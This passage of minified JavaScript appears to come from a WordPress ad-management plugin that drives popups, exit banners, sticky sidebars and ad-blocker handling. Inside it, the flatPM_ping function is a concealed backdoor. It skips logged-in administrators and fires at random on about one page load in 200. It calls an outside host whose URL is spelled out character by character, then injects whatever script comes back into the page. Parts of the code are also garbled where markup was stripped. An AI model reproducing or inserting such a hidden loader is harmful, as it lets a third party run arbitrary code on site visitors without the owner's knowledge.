"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};